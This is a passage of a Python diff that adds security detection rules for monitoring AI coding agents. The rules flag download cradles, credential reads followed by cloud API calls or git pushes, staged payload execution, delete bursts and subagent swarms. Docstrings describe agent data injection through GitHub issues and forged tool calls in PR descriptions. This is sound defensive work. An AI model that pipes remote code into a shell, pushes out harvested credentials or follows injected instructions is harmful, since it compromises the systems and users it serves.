+ piped = _has_trait(event, "pipe_to_shell")
576
+ piped_local = _has_trait(event, "pipe_to_shell_local")
577
+ encoded = _has_trait(event, "encoded_cmd")
578
+ if piped_local and not (raw_ip_fetch or piped):
579
+ # Same shape, no ingress: the fetch never left this host. Recorded
580
+ # rather than suppressed, because staging a payload on a local port
581
+ # and then executing it is a real technique, and a rule that goes
582
+ # silent here would miss it. Low, so it stops drowning the criticals.
583
+ return [
584
+ Detection(
585
+ rule_id="encoded-command-download",
586
+ title="Local content piped into an interpreter",
587
+ severity="low",
588
+ summary=(
589
+ f"{_tool_qualified(event) or 'A command'} piped content from "
590
+ "a loopback address into an interpreter"
591
+ + (" via an encoded command" if encoded else "")
592
+ + ". Nothing crossed the network; noted for completeness."
593
+ ),
594
+ correlation_id=_correlation_id(events),
595
+ # No T1105 and no TA0011. Ingress Tool Transfer and Command
596
+ # and Control both mean content arriving from outside;
597
+ # claiming either for a loopback fetch would put a false
598
+ # ATT&CK mapping in front of an analyst.
599
+ tactic_ids=["TA0002"],
600
+ technique_ids=["T1059"],
601
+ event_ids=[_event_id(event)],
602
+ first_seen_utc=_ts(event),
603
+ last_seen_utc=_ts(event),
604
+ )
605
+ ]
606
+ if raw_ip_fetch or piped:
607
+ techniques = ["T1105", "T1059.001"] # Ingress Tool Transfer, PowerShell
608
+ if encoded:
609
+ techniques.append("T1027") # Obfuscated Files or Information
610
+ # Say which thing was actually seen. The rule fires on two distinct
611
+ # shapes now, and reporting "a raw IP" for a domain-hosted cradle
612
+ # would be a false statement in the detection itself.
613
+ how = (
614
+ "piped remote content straight into an interpreter"
615
+ if piped
616
+ else "fetched and executed content from a raw IP address"
617
+ )
618
+ return [
619
+ Detection(
620
+ rule_id="encoded-command-download",
621
+ title="Remote code fetched and executed",
622
+ severity="critical",
623
+ summary=(
624
+ f"{_tool_qualified(event) or 'A command'} {how}"
625
+ + (" via an encoded command" if encoded else "")
626
+ + ". A classic download cradle."
627
+ ),
628
+ correlation_id=_correlation_id(events),
629
+ tactic_ids=["TA0011", "TA0002"],
630
+ technique_ids=techniques,
631
+ event_ids=[_event_id(event)],
632
+ first_seen_utc=_ts(event),
633
+ last_seen_utc=_ts(event),
634
+ )
635
+ ]
636
+ return []
637
+
638
+
639
+ def _is_delete(event: dict[str, Any]) -> bool:
640
+ """Is this event actually a destruction of data?
641
+
642
+ Deliberately NOT a substring test. `"delete" in tool or "remove" in tool`
643
+ matched `editor.remove_whitespace`, `remove_import` and `undelete`, so an
644
+ ordinary refactor produced a *critical* "data destruction attack". Same
645
+ class of bug as the loose tool matching fixed in core/audit/mitre.py.
646
+
647
+ Authority order: the ATT&CK technique first (mitre.py already normalizes
648
+ tool spellings), then an exact match on known destructive verbs, then the
649
+ command text, so `bash: rm -rf build/` counts even though the tool is
650
+ "Bash".
651
+ """
652
+ if _technique_id(event) in ("T1485", "T1070.004"):
653
+ return True
654
+ method = _norm_tool(_tool_qualified(event).rsplit(".", 1)[-1])
655
+ if method in _DELETE_METHODS:
656
+ return True
657
+ if _DELETE_COMMAND.search(_command(event)):
658
+ return True
659
+ return _has_trait(event, "delete_cmd")
660
+
661
+
662
+ def rule_destructive_delete_burst(events: list[dict[str, Any]]) -> list[Detection]:
663
+ """A burst of deletions in one session.
664
+
665
+ High rather than critical: an agent cleaning build artifacts looks identical
666
+ to an agent destroying data, and only the operator knows which. Critical is
667
+ reserved for patterns that are hard to explain innocently (credential exfil,
668
+ a denied action running anyway).
669
+ """
670
+ deletes = [
671
+ e
672
+ for e in events
673
+ if _action_type(e) == "tool_called" and _outcome(e) == "success" and _is_delete(e)
674
+ ]
675
+ if len(deletes) < _threshold("delete_burst"):
676
+ return []
677
+ return [
678
+ Detection(
679
+ rule_id="destructive-delete-burst",
680
+ title="Burst of destructive deletions",
681
+ severity="high",
682
+ summary=(
683
+ f"{len(deletes)} deletion operations in a single session. Worth confirming "
684
+ "this was intended cleanup and not data destruction."
685
+ ),
686
+ correlation_id=_correlation_id(events),
687
+ tactic_ids=["TA0040"],
688
+ technique_ids=sorted({_technique_id(e) for e in deletes if _technique_id(e)}),
689
+ event_ids=[_event_id(e) for e in deletes],
690
+ first_seen_utc=_ts(deletes[0]),
691
+ last_seen_utc=_ts(deletes[-1]),
692
+ )
693
+ ]
694
+
695
+
696
+ def rule_off_hours_activity(events: list[dict[str, Any]]) -> list[Detection]:
697
+ """An autonomous agent performs an impact action outside business hours.
698
+
699
+ Opt-in (`AGENTMETRY_DETECT_OFF_HOURS=1`) and off by default, because as a
700
+ generic rule this is mostly noise:
701
+
702
+ * Scheduled jobs run at night. That is what cron is for. Flagging a nightly
703
+ archive as "highly suspicious" trains operators to ignore the feed, so
704
+ `trigger: cron` is excluded outright.
705
+ * "Business hours" are local, not UTC. 23:00-05:00 UTC is early evening in
706
+ the US. The window and timezone are therefore operator-configured
707
+ (`AGENTMETRY_BUSINESS_HOURS`, `AGENTMETRY_BUSINESS_TZ`), not assumed.
708
+
709
+ Timezone handling matters here: the previous version read `dt.hour` straight
710
+ off the parsed timestamp, so an event stamped `02:00+09:00` (17:00 UTC, a
711
+ Tuesday afternoon) was reported as off-hours "Hour: 2 UTC". Timestamps are
712
+ converted explicitly before comparing.
713
+ """
714
+ from agentmetry.core.config import settings
715
+
716
+ if not settings.detect_off_hours:
717
+ return []
718
+
719
+ tz = _business_tz(settings.business_tz)
720
+ start_h, end_h = _business_window(settings.business_hours)
721
+
722
+ for event in events:
723
+ if _actor_type(event) != "autonomous":
724
+ continue
725
+ # A scheduled job running at 03:00 is doing its job, not hiding.
726
+ if _trigger(event) in _SCHEDULED_TRIGGERS:
727
+ continue
728
+ if _tactic_id(event) != "TA0040" or _outcome(event) != "success":
729
+ continue
730
+
731
+ local = _to_tz(_ts(event), tz)
732
+ if local is None:
733
+ continue
734
+
735
+ weekend = local.weekday() >= 5
736
+ outside = not (start_h <= local.hour < end_h)
737
+ if not (weekend or outside):
738
+ continue
739
+
740
+ when = "the weekend" if weekend else f"{local.hour:02d}:00 local"
741
+ return [
742
+ Detection(
743
+ rule_id="off-hours-activity",
744
+ title="Autonomous impact action outside business hours",
745
+ severity="medium",
746
+ summary=(
747
+ f"An unscheduled autonomous agent modified or deleted data on {when} "
748
+ f"({local.tzname()}), outside the configured "
749
+ f"{start_h:02d}:00-{end_h:02d}:00 window."
750
+ ),
751
+ correlation_id=_correlation_id(events),
752
+ tactic_ids=[_tactic_id(event)],
753
+ technique_ids=[_technique_id(event)] if _technique_id(event) else [],
754
+ event_ids=[_event_id(event)],
755
+ first_seen_utc=_ts(event),
756
+ last_seen_utc=_ts(event),
757
+ )
758
+ ]
759
+ return []
760
+
761
+
762
+ def _method(event: dict[str, Any]) -> str:
763
+ return _norm_tool(_tool_qualified(event).rsplit(".", 1)[-1])
764
+
765
+
766
+ def _is_untrusted_input(event: dict[str, Any]) -> bool:
767
+ """Did this event pull content an outsider could have authored?"""
768
+ if _method(event) in _UNTRUSTED_INPUT_METHODS:
769
+ return True
770
+ if _UNTRUSTED_INPUT_COMMAND.search(_command(event)):
771
+ return True
772
+ return _has_trait(event, "untrusted_input")
773
+
774
+
775
+ def _is_risky(event: dict[str, Any]) -> bool:
776
+ if _tactic_id(event) in _RISKY_TACTICS:
777
+ return True
778
+ technique = _technique_id(event)
779
+ return any(technique.startswith(t) for t in _RISKY_TECHNIQUES)
780
+
781
+
782
+ def rule_untrusted_input_then_risky_action(events: list[dict[str, Any]]) -> list[Detection]:
783
+ """A session ingested attacker-authorable data, then did something dangerous.
784
+
785
+ Agent Data Injection (arXiv:2607.05120): an attacker hides malicious data
786
+ inside content the agent already trusts, such as a GitHub issue comment
787
+ carrying forged author metadata. The agent then acts on it. The paper's
788
+ remote-code-execution chain is exactly `gh issue view` followed by executing
789
+ a command the attacker supplied.
790
+
791
+ This rule adds *provenance*, which no other rule here has: it says the risky
792
+ action happened in a session that had already swallowed attacker-controllable
793
+ content. That matters because the paper shows every prevention defense fails
794
+ on ADI, including alignment guardrails, since the agent is still doing the
795
+ task the user asked for. Only the data it acted on was corrupted, so the
796
+ behaviour is the only evidence left.
797
+
798
+ Plain execution after ingestion is deliberately NOT flagged: "read the issue,
799
+ then run the tests" is the most common agent workflow there is. Only an
800
+ already-risky technique (credential access, egress, destruction, obfuscated
801
+ download) qualifies.
802
+ """
803
+ ingest_idx = next((i for i, e in enumerate(events) if _is_untrusted_input(e)), None)
804
+ if ingest_idx is None:
805
+ return []
806
+
807
+ for event in events[ingest_idx + 1:]:
808
+ if _action_type(event) != "tool_called" or _outcome(event) != "success":
809
+ continue
810
+ # Reading more untrusted content is not an escalation. Without this,
811
+ # two consecutive web reads flagged each other.
812
+ if _is_untrusted_input(event):
813
+ continue
814
+ if not _is_risky(event):
815
+ continue
816
+ source = events[ingest_idx]
817
+ return [
818
+ Detection(
819
+ rule_id="untrusted-input-then-risky-action",
820
+ title="Risky action after ingesting untrusted content",
821
+ severity="high",
822
+ summary=(
823
+ f"{_tool_qualified(source) or 'A tool'} pulled externally-authored content, "
824
+ f"then {_tool_qualified(event) or 'a tool'} performed a "
825
+ f"{_technique_id(event) or 'risky'} action in the same session. "
826
+ "Agent data injection hides instructions in data the agent trusts."
827
+ ),
828
+ correlation_id=_correlation_id(events),
829
+ tactic_ids=[t for t in (_tactic_id(source), _tactic_id(event)) if t],
830
+ technique_ids=[t for t in (_technique_id(source), _technique_id(event)) if t],
831
+ event_ids=[_event_id(source), _event_id(event)],
832
+ first_seen_utc=_ts(source),
833
+ last_seen_utc=_ts(event),
834
+ )
835
+ ]
836
+ return []
837
+
838
+
839
+ def rule_pr_merged_without_review(events: list[dict[str, Any]]) -> list[Detection]:
840
+ """A pull request was merged without the agent ever fetching the code.
841
+
842
+ Agent Data Injection (arXiv:2607.05120 §4.3): an attacker crafts a PR whose
843
+ description contains a forged tool call and response, so the agent believes
844
+ it already reviewed a commit it never read, and merges. The tell is an
845
+ absence: a merge with no preceding fetch of the diff.
846
+
847
+ Worth flagging even without ADI. An agent that merges code it never looked at
848
+ is a supply-chain risk on its own.
849
+ """
850
+ reviewed = False
851
+ saw_pr = False
852
+ for event in events:
853
+ if _action_type(event) != "tool_called":
854
+ continue
855
+ method, cmd = _method(event), _command_words(event)
856
+
857
+ if method in _PR_DESC_METHODS or _PR_DESC_COMMAND.search(cmd) or _has_trait(event, "pr_desc"):
858
+ saw_pr = True
859
+ if method in _PR_COMMIT_METHODS or _PR_COMMIT_COMMAND.search(cmd) or _has_trait(event, "pr_commit"):
860
+ reviewed = True
861
+ continue
862
+
863
+ merging = (
864
+ method in _PR_MERGE_METHODS
865
+ or _PR_MERGE_COMMAND.search(cmd)
866
+ or _has_trait(event, "pr_merge")
867
+ )
868
+ if merging and saw_pr and not reviewed and _outcome(event) == "success":
869
+ return [
870
+ Detection(
871
+ rule_id="pr-merged-without-review",
872
+ title="Pull request merged without reading the code",
873
+ severity="critical",
874
+ summary=(
875
+ "The agent merged a pull request without ever fetching its diff. "
876
+ "A forged tool response can convince an agent it reviewed code it "
877
+ "never read."
878
+ ),
879
+ correlation_id=_correlation_id(events),
880
+ tactic_ids=["TA0001"], # Initial Access via supply chain
881
+ technique_ids=["T1195.002"], # Compromise Software Supply Chain
882
+ event_ids=[_event_id(event)],
883
+ first_seen_utc=_ts(event),
884
+ last_seen_utc=_ts(event),
885
+ )
886
+ ]
887
+ return []
888
+
889
+
890
+ def rule_credential_read_then_cloud_api(events: list[dict[str, Any]]) -> list[Detection]:
891
+ """Credential access (T1552) then a cloud or cluster API in the same session.
892
+
893
+ Hugging Face's July 2026 agentic intrusion harvested cloud and cluster
894
+ credentials, then used them to move laterally. The read alone is collection;
895
+ the cloud CLI call is the escalation worth paging on.
896
+ """
897
+ cred_idx = next((i for i, e in enumerate(events) if _is_credential_access(e)), None)
898
+ if cred_idx is None:
899
+ return []
900
+
901
+ for event in events[cred_idx + 1:]:
902
+ if _action_type(event) != "tool_called" or _outcome(event) != "success":
903
+ continue
904
+ if not (_CLOUD_API.search(_command(event)) or _has_trait(event, "cloud_api")):
905
+ continue
906
+ cred = events[cred_idx]
907
+ return [
908
+ Detection(
909
+ rule_id="credential-read-then-cloud-api",
910
+ title="Credential access followed by cloud or cluster API",
911
+ severity="critical",
912
+ summary=(
913
+ f"{_tool_qualified(cred) or 'A tool'} accessed credentials, then "
914
+ f"{_tool_qualified(event) or 'a tool'} invoked a cloud or cluster "
915
+ "API (kubectl, aws, gcloud, az, or Hugging Face CLI) in the same "
916
+ "session."
917
+ ),
918
+ correlation_id=_correlation_id(events),
919
+ tactic_ids=["TA0006", "TA0008"],
920
+ technique_ids=[_technique_id(cred), "T1078"],
921
+ event_ids=[_event_id(cred), _event_id(event)],
922
+ first_seen_utc=_ts(cred),
923
+ last_seen_utc=_ts(event),
924
+ )
925
+ ]
926
+ return []
927
+
928
+
929
+ def rule_dotfile_read_then_git_push(events: list[dict[str, Any]]) -> list[Detection]:
930
+ """Credential read (T1552) then push to a remote repository.
931
+
932
+ Matches the exfil pattern seen in supply-chain campaigns: harvest secrets
933
+ locally, then publish them via the victim's own git credentials.
934
+ """
935
+ cred_idx = next((i for i, e in enumerate(events) if _is_credential_access(e)), None)
936
+ if cred_idx is None:
937
+ return []
938
+
939
+ for event in events[cred_idx + 1:]:
940
+ if _action_type(event) != "tool_called" or _outcome(event) != "success":
941
+ continue
942
+ if not (_GIT_EXFIL.search(_command(event)) or _has_trait(event, "git_exfil")):
943
+ continue
944
+ cred = events[cred_idx]
945
+ return [
946
+ Detection(
947
+ rule_id="dotfile-read-then-git-push",
948
+ title="Credential read followed by git push",
949
+ severity="critical",
950
+ summary=(
951
+ f"{_tool_qualified(cred) or 'A tool'} accessed credentials, then "
952
+ f"{_tool_qualified(event) or 'a tool'} pushed to a remote repository "
953
+ "in the same session."
954
+ ),
955
+ correlation_id=_correlation_id(events),
956
+ tactic_ids=["TA0006", "TA0010"],
957
+ technique_ids=[_technique_id(cred), "T1567.001"],
958
+ event_ids=[_event_id(cred), _event_id(event)],
959
+ first_seen_utc=_ts(cred),
960
+ last_seen_utc=_ts(event),
961
+ )
962
+ ]
963
+ return []
964
+
965
+
966
+ def rule_remote_staging_then_execute(events: list[dict[str, Any]]) -> list[Detection]:
967
+ """Fetch from a public staging host, then execute in a separate step.
968
+
969
+ Agent C2 in the HF July 2026 disclosure staged payloads on public services.
970
+ A one-liner `curl … | bash` is already caught by encoded-command-download;
971
+ this rule covers the two-step variant: download to disk, then run.
972
+ """
973
+ # Any remote host, when the file fetched is the file run.
974
+ #
975
+ # STAGING_HOST is a list of seven services, and registering a domain costs a
976
+ # few euros, so the list described where payloads were staged in the
977
+ # incidents we read about rather than where they can be staged (#43).
978
+ #
979
+ # Widening it to "any remote host" on its own would fire on
980
+ # `curl -sO https://api.example.com/schema.json && python generate.py`,
981
+ # which is a normal working day. Requiring the fetched basename to be the
982
+ # executed basename is what makes host-agnostic safe: it is not "you
983
+ # downloaded something and later ran something", it is "you ran the thing
984
+ # you just downloaded".
985
+ for i, fetch in enumerate(events):
986
+ if _action_type(fetch) != "tool_called" or _outcome(fetch) != "success":
987
+ continue
988
+ downloaded = _fetched_files(_command(fetch))
989
+ if not downloaded:
990
+ continue
991
+ for event in events[i + 1:]:
992
+ if _action_type(event) != "tool_called" or _outcome(event) != "success":
993
+ continue
994
+ if not downloaded & _executed_files(_command(event)):
995
+ continue
996
+ shared = sorted(downloaded & _executed_files(_command(event)))[0]
997
+ return [
998
+ Detection(
999
+ rule_id="remote-staging-then-execute",
1000
+ title="Downloaded file executed in the same session",
1001
+ severity="critical",
1002
+ summary=(
1003
+ f"{_tool_qualified(fetch) or 'A tool'} downloaded `{shared}` from "
1004
+ f"a remote host, then {_tool_qualified(event) or 'a tool'} executed "
1005
+ "that same file in the same session."
1006
+ ),
1007
+ correlation_id=_correlation_id(events),
1008
+ tactic_ids=["TA0011", "TA0002"],
1009
+ technique_ids=["T1105", "T1059"],
1010
+ event_ids=[_event_id(fetch), _event_id(event)],
1011
+ first_seen_utc=_ts(fetch),
1012
+ last_seen_utc=_ts(event),
1013
+ )
1014
+ ]
1015
+
1016
+ fetch_idx = next((i for i, e in enumerate(events) if _is_staging_fetch(e)), None)
1017
+ if fetch_idx is None:
1018
+ return []
1019
+
1020
+ for event in events[fetch_idx + 1:]:
1021
+ if _is_staging_fetch(event):
1022
+ continue
1023
+ if not _is_risky_exec_after_staging(event):
1024
+ continue
1025
+ source = events[fetch_idx]
1026
+ return [
1027
+ Detection(
1028
+ rule_id="remote-staging-then-execute",
1029
+ title="Staged download from public host followed by execution",
1030
+ severity="critical",
1031
+ summary=(
1032
+ f"{_tool_qualified(source) or 'A tool'} fetched content from a "
1033
+ "public staging host (GitHub raw, gist, Hugging Face, etc.), then "
1034
+ f"{_tool_qualified(event) or 'a tool'} executed code in the same "
1035
+ "session."
1036
+ ),
1037
+ correlation_id=_correlation_id(events),
1038
+ tactic_ids=["TA0011", "TA0002"],
1039
+ technique_ids=["T1105", "T1059"],
1040
+ event_ids=[_event_id(source), _event_id(event)],
1041
+ first_seen_utc=_ts(source),
1042
+ last_seen_utc=_ts(event),
1043
+ )
1044
+ ]
1045
+ return []
1046
+
1047
+
1048
+ def _parse_ts(ts: str) -> datetime | None:
1049
+ if not ts:
1050
+ return None
1051
+ try:
1052
+ dt = datetime.fromisoformat(ts.replace("Z", "+00:00"))
1053
+ except ValueError:
1054
+ return None
1055
+ return dt.replace(tzinfo=timezone.utc) if dt.tzinfo is None else dt
1056
+
1057
+
1058
+ def _densest_window(
1059
+ events: list[dict[str, Any]], count: int, window_minutes: int
1060
+ ) -> list[dict[str, Any]] | None:
1061
+ """Return the first run of `count` events inside `window_minutes`, else None.
1062
+
1063
+ A count with no time bound is not a burst, it is a total. Forty tool calls
1064
+ is an ordinary long coding session; forty in ten minutes is a machine. The
1065
+ same logic un-breaks host aggregation, where a window of the last 500 events
1066
+ with no clock meant eight subagent starts spread over two weeks of light use
1067
+ fired a "coordinated campaign" alert.
1068
+
1069
+ Events with unparsable timestamps are counted as if in-window rather than
1070
+ dropped: a broken clock should not silently disable a rule.
1071
+ """
1072
+ if count <= 0 or len(events) < count:
1073
+ return None
1074
+ if window_minutes <= 0:
1075
+ return events[:count]
1076
+
1077
+ span = timedelta(minutes=window_minutes)
1078
+ stamps = [_parse_ts(_ts(e)) for e in events]
1079
+ for start in range(0, len(events) - count + 1):
1080
+ end = start + count - 1
1081
+ first, last = stamps[start], stamps[end]
1082
+ if first is None or last is None or (last - first) <= span:
1083
+ return events[start : end + 1]
1084
+ return None
1085
+
1086
+
1087
+ def _is_subagent_start(event: dict[str, Any]) -> bool:
1088
+ if _action_type(event) != "tool_called" or _outcome(event) != "success":
1089
+ return False
1090
+ reason = str(_action(event).get("reason") or "")
1091
+ if reason.startswith("subagent_start:"):
1092
+ return True
1093
+ return ".subagent." in _tool_qualified(event).lower()
1094
+
1095
+
1096
+ def _is_subagent_lifecycle(event: dict[str, Any]) -> bool:
1097
+ """Any subagent spawn or finish marker.
1098
+
1099
+ These have a dedicated rule (subagent-swarm-burst); counting them again in
1100
+ the generic session-tool-burst is double jeopardy, and a subagent finish is
1101
+ not a tool the agent chose to call. Excluded from the tool-burst count.
1102
+ """
1103
+ reason = str(_action(event).get("reason") or "")
1104
+ if reason.startswith("subagent_start:") or reason.startswith("subagent_stop:"):
1105
+ return True
1106
+ qualified = _tool_qualified(event).lower()
1107
+ return ".subagent." in qualified or ".subagent_stop." in qualified
1108
+
1109
+
1110
+ def rule_subagent_swarm_burst(events: list[dict[str, Any]]) -> list[Detection]:
1111
+ """Many subagent spawns in one session.
1112
+
1113
+ Kimi AgentSwarm and Qwen Agent Teams fan work out to isolated subagents.
1114
+ A burst can indicate autonomous swarm behaviour similar to the HF July 2026
1115
+ disclosure (many short-lived workers in one campaign).
1116
+ """
1117
+ starts = [e for e in events if _is_subagent_start(e)]
1118
+ window = _densest_window(
1119
+ starts, _threshold("subagent_burst"), _threshold("subagent_burst_window_minutes")
1120
+ )
1121
+ if window is None:
1122
+ return []
1123
+ return [
1124
+ Detection(
1125
+ rule_id="subagent-swarm-burst",
1126
+ title="Burst of subagent spawns in one session",
1127
+ severity="high",
1128
+ summary=(
1129
+ f"{len(window)} subagent starts within "
1130
+ f"{_threshold('subagent_burst_window_minutes')} minutes in a single "
1131
+ "session. Common in AgentSwarm / Agent Teams; worth confirming this "
1132
+ "was intended parallel work and not an autonomous attack swarm."
1133
+ ),
1134
+ correlation_id=_correlation_id(events),
1135
+ tactic_ids=["TA0002"],
1136
+ technique_ids=["T1059"],
1137
+ event_ids=[_event_id(e) for e in window],
1138
+ first_seen_utc=_ts(window[0]),
1139
+ last_seen_utc=_ts(window[-1]),
1140
+ )
1141
+ ]
1142
+
1143
+
1144
+ def rule_session_tool_burst(events: list[dict[str, Any]]) -> list[Detection]:
1145
+ """Many successful tool calls in one session.
1146
+
1147
+ Autonomous agent campaigns (HF July 2026, Kimi AgentSwarm) often fan out
1148
+ dozens of tool invocations in a single correlation window. Normal interactive
1149
+ coding rarely exceeds a handful per minute — a burst is worth confirming.
1150
+ """
1151
+ tools = [
1152
+ e
1153
+ for e in events
1154
+ if _action_type(e) == "tool_called"
1155
+ and _outcome(e) == "success"
1156
+ and not _is_subagent_lifecycle(e)
1157
+ ]
1158
+ minutes = _threshold("session_tool_burst_window_minutes")
1159
+ window = _densest_window(tools, _threshold("session_tool_burst"), minutes)
1160
+ if window is None:
1161
+ return []
1162
+ return [
1163
+ Detection(
1164
+ rule_id="session-tool-burst",
1165
+ title="Burst of tool calls in one session",
1166
+ severity="high",
1167
+ summary=(
1168
+ f"{len(window)} successful tool calls within {minutes} minutes in a "
1169
+ "single session. Common in autonomous agent campaigns; confirm this "
1170
+ "was intended work."
1171
+ ),
1172
+ correlation_id=_correlation_id(events),
1173
+ tactic_ids=["TA0002"],
1174
+ technique_ids=["T1059"],
1175
+ event_ids=[_event_id(e) for e in window[:20]],
1176
+ first_seen_utc=_ts(window[0]),
1177
+ last_seen_utc=_ts(window[-1]),
1178
+ )
1179
+ ]
1180
+
1181
+
1182
+ def _host_id(events: list[dict[str, Any]]) -> str:
1183
+ for event in events:
1184
+ hid = event.get("host_id")
1185
+ if hid:
1186
+ return str(hid)
1187
+ return ""
1188
+
1189
+
1190
+ def rule_host_subagent_swarm_burst(events: list[dict[str, Any]]) -> list[Detection]:
1191
+ """Subagent spawns aggregated across sessions on one host.
1192
+
1193
+ Per-session swarm detection misses campaigns that restart sessions between
1194
+ bursts. Host-level aggregation catches parallel workers even when each
1195
+ session stays under the per-session threshold.
1196
+ """
1197
+ starts = [e for e in events if _is_subagent_start(e)]
1198
+ minutes = _threshold("host_subagent_burst_window_minutes")
1199
+ window = _densest_window(starts, _threshold("host_subagent_burst"), minutes)
1200
+ if window is None:
1201
+ return []
1202
+ host = _host_id(events)
1203
+ sessions = sorted({str(e.get("correlation_id") or "") for e in window if e.get("correlation_id")})
1204
+ return [
1205
+ Detection(
1206
+ rule_id="host-subagent-swarm-burst",
1207
+ title="Subagent swarm across sessions on one host",
1208
+ severity="high",
1209
+ summary=(
1210
+ f"{len(window)} subagent starts across {len(sessions)} session(s) "
1211
+ f"within {minutes} minutes on host {host or 'unknown'}. May indicate "
1212
+ "a coordinated autonomous campaign rather than a single interactive "
1213
+ "session."
1214
+ ),
1215
+ correlation_id=host or _correlation_id(events),
1216
+ tactic_ids=["TA0002"],
1217
+ technique_ids=["T1059"],
1218
+ event_ids=[_event_id(e) for e in window[:20]],
1219
+ first_seen_utc=_ts(window[0]),
1220
+ last_seen_utc=_ts(window[-1]),
1221
+ )
1222
+ ]
1223
+
1224
+
1225
+ REGISTRY = [
1226
+ rule_credential_exfil,
1227
+ rule_autonomous_unapproved_write,
1228
+ rule_discovery_then_collect,
1229
+ rule_approval_denied_then_executed,
1230
+ rule_encoded_command_download,
1231
+ rule_destructive_delete_burst,
1232
+ rule_off_hours_activity,
1233
+ rule_untrusted_input_then_risky_action,
1234
+ rule_pr_merged_without_review,
1235
+ rule_credential_read_then_cloud_api,
1236
+ rule_dotfile_read_then_git_push,
1237
+ rule_remote_staging_then_execute,
1238
+ rule_subagent_swarm_burst,
1239
+ rule_session_tool_burst,
1240
+ ]
1241
+
1242
+ HOST_REGISTRY = [
1243
+ rule_host_subagent_swarm_burst,
1244
+ ]
1245
+
1246
+ #: Every rule id the built-in rules can emit.
1247
+ #:
1248
+ #: Written out rather than derived, because the ids live inside the functions
1249
+ #: and the alternative is calling every rule to find out what it might say.
1250
+ #: `test_detection_rule_identity.py` greps this module and fails if the two
1251
+ #: disagree, so it cannot drift silently.
1252
+ BUILTIN_RULE_IDS: frozenset[str] = frozenset({
1253
+ "credential-exfil",
1254
+ "autonomous-unapproved-write",
1255
+ "discovery-then-collect",
1256
+ "approval-denied-then-executed",
1257
+ "encoded-command-download",
1258
+ "destructive-delete-burst",
1259
+ "off-hours-activity",
1260
+ "untrusted-input-then-risky-action",
1261
+ "pr-merged-without-review",
1262
+ "credential-read-then-cloud-api",
1263
+ "dotfile-read-then-git-push",
1264
+ "remote-staging-then-execute",
1265
+ "subagent-swarm-burst",
1266
+ "session-tool-burst",
1267
+ "host-subagent-swarm-burst",
1268
+ })
1269
+
1270
+ #: Renames, as `old id -> current id`.
1271
+ #:
1272
+ #: A rule id is not an implementation detail once someone has dispositioned a
1273
+ #: finding under it. Renaming `credential-exfil` without this map would orphan
1274
+ #: every "we checked, it was our CI bot" ever recorded against it, and the
1275
+ #: evidence pack would report those periods as untriaged. Add an entry here
1276
+ #: instead of renaming in place, and the triage history follows the rule.
1277
+ #:
1278
+ #: Entries are permanent. Removing one re-orphans exactly the decisions it was
1279
+ #: added to protect.
1280
+ RULE_ALIASES: dict[str, str] = {
1281
+ # "old-rule-id": "current-rule-id",
1282
+ }
1283
+
1284
+
1285
+ def canonical_rule_id(rule_id: str) -> str:
1286
+ """Resolve a possibly historical rule id to the one in force today."""
1287
+ seen: set[str] = set()
1288
+ current = (rule_id or "").strip()
1289
+ while current in RULE_ALIASES and current not in seen:
1290
+ seen.add(current)
1291
+ current = RULE_ALIASES[current]
1292
+ return current
1293
+
1294
+
1295
+ def historical_rule_ids(rule_id: str) -> list[str]:
1296
+ """Every id this rule has ever been called, oldest names first.
1297
+
1298
+ Used to find triage recorded before a rename.
1299
+ """
1300
+ canonical = canonical_rule_id(rule_id)
1301
+ return [old for old, new in RULE_ALIASES.items() if canonical_rule_id(new) == canonical]
1302
+
1303
+
1304
+ def known_rule_ids() -> frozenset[str]:
1305
+ """Ids a detection can legitimately carry right now.
1306
+
1307
+ Built-ins, analyst-authored YAML count rules, and historical names. A rule
1308
+ id outside this set on a disposition means someone typed it or the rule was
1309
+ deleted, and both are worth catching rather than storing.
1310
+ """
1311
+ from .yaml_config import count_rules
1312
+
1313
+ yaml_ids = {str(spec["id"]) for spec in count_rules() if spec.get("id")}
1314
+ return frozenset(BUILTIN_RULE_IDS | yaml_ids | set(RULE_ALIASES))